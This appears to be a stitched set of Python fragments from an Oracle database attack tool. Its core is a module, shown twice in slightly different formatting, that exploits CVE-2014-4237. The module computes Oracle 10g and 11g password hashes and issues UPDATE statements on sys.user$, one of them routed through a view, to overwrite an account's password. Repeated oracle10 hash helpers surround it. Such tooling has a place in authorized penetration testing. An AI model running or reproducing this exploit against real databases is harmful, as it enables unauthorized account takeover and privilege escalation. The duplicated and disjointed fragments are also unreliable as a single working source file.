def generate(self, cli_object):
if cli_object.username is None:
print "You must provide a username for oracle10 hashes!"
return "Oracle10 Hashes require a username"
generatedhash = oracle10.encrypt(cli_object.plaintext,
user=cli_object.username)
return generatedhash
def runCVEXXXYYYModule(args):
'''
Run the CVE_XXXX_YYYY module
'''
if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"],
checkAccount=False) == False:
return EXIT_MISS_ARGUMENT
cve = CVE_XXXX_YYYY(args)
status = cve.connection(stopIfError=True)
if args['test-module'] == True:
cve.testAll()
if args['set-pwd-2014-4237'] != None:
hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1])
hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1],
user=args['set-pwd-2014-4237'][0])
logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(
hash11g, hash10g, args['set-pwd-2014-4237'][0]))
REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(
args['set-pwd-2014-4237'][0], hash10g, hash11g)
REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(
args['set-pwd-2014-4237'][0], hash10g, hash11g)
args['print'].title(
"Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237"
.format(args['set-pwd-2014-4237'][0], hash10g, hash11g))
status = cve.exploit_CVE_2014_4237(
updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237,
updateRequestWithView=
REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
if status == True:
cve.args['print'].goodNews(
"The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!"
.format(args['set-pwd-2014-4237'][0],
args['set-pwd-2014-4237'][1]))
elif status == False:
cve.args['print'].badNews(
"The password of '{0}' has NOT been replaced".format(
args['set-pwd-2014-4237'][0]))
elif status == None:
cve.args['print'].goodNews(
"The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!"
.format(args['set-pwd-2014-4237'][0]))
def runCVEXXXYYYModule(args):
'''
Run the CVE_XXXX_YYYY module
'''
if checkOptionsGivenByTheUser(args,["test-module","set-pwd-2014-4237"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT
cve = CVE_XXXX_YYYY(args)
status = cve.connection(stopIfError=True)
if args['test-module'] == True :
cve.testAll()
if args['set-pwd-2014-4237'] != None :
hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1])
hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0])
logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, args['set-pwd-2014-4237'][0]))
REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g)
args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(args['set-pwd-2014-4237'][0],hash10g, hash11g))
status = cve.exploit_CVE_2014_4237(updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
if status == True:
cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(args['set-pwd-2014-4237'][0],args['set-pwd-2014-4237'][1]))
elif status == False:
cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(args['set-pwd-2014-4237'][0]))
elif status == None:
cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(args['set-pwd-2014-4237'][0]))
def digest(self):
return unhexlify(oracle10.encrypt(self.data[:64], user=self._user))
def digest(self):
return oracle10.encrypt(self._data[:64], user=self._user).decode('hex')
def generate(self, cli_object):
if cli_object.username is None:
print "You must provide a username for oracle10 hashes!"
return "Oracle10 Hashes require a username"
generatedhash = oracle10.encrypt(cli_object.plaintext, user=cli_object.username)
return generatedhash